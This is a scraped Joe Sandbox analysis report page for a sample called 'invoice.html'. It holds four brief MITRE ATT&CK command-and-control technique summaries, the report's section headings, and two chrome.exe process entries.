Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report invoice.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 3404, Parent PID: 6092

General

Chronological Activities

Analysis Process: chrome.exePID: 6392, Parent PID: 3404

General

Chronological Activities

Disassembly

Windows Analysis Report
invoice.html